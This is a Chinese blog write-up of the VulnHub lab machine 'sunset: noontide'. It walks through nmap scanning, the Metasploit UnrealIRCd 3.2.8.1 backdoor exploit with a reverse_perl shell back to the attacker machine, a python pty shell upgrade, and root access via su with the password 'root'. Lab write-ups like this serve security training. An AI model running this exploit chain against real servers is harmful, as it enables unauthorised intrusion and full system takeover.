您当前的位置: 首页 >  ide

仙女象

暂无认证

  • 2浏览

    0关注

    136博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

vulnhub sunset: noontide

仙女象 发布时间:2022-03-23 19:09:12 ,浏览量:2

渗透思路:

nmap扫描 ---- searchsploit搜索payload ---- Metasploit利用UnrealIRCd漏洞得到shell ---- su命令弱密码提权

环境信息:

靶机:192.168.101.48

攻击机:192.168.101.25

具体步骤: 步骤1、nmap扫描
sudo nmap -sC -sV -p- 192.168.101.48

扫描到了6667、6697、8067端口,都是irc,version都是UnrealIRCd

步骤2、searchsploit搜索payload
searchsploit UnrealIRCd

搜出来的结果中除了DoS,其他针对的UnrealIRCd版本都是相同的。

第一行的后门命令执行是Metasploit的,应该利用起来比较简单。

步骤3、Metasploit利用UnrealIRCd漏洞得到shell

命令行输入msfconsole进入msfconsole

输入

search UnrealIRCd

找到可以利用的exploit:exploit/unix/irc/unreal_ircd_3281_backdoor

输入以下命令选中exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/irc/unreal_ircd_3281_backdoor

输入以下命令查看选项

show options

输入以下命令设置靶机ip

set RHOSTS 192.168.101.48

输入以下命令查看能用什么payload

show payloads

这边我就简化一点了,这个靶机可以用下图第7个payload:payload/cmd/unix/reverse_perl

但其实我一开始试了个别的payload(payload/cmd/unix/reverse),三个端口都没获得shell

输入以下命令配置payload

set payload payload/cmd/unix/reverse_perl

输入show options查看选项,可以看到还缺个LHOST需要配置

输入以下命令设置攻击机ip

set LHOST 192.168.101.25

最后show options检查一下配置是否正确

输入run发起攻击,得到反弹shell

输入以下命令得到交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

第一个flag在server用户家目录下

步骤4、su弱密码提权

靶机命令行输入su,然后输入密码root,即可获得root用户权限

第二个flag在/root/目录下

关注
打赏
1661867686
查看更多评论
立即登录/注册

微信扫码登录

0.1393s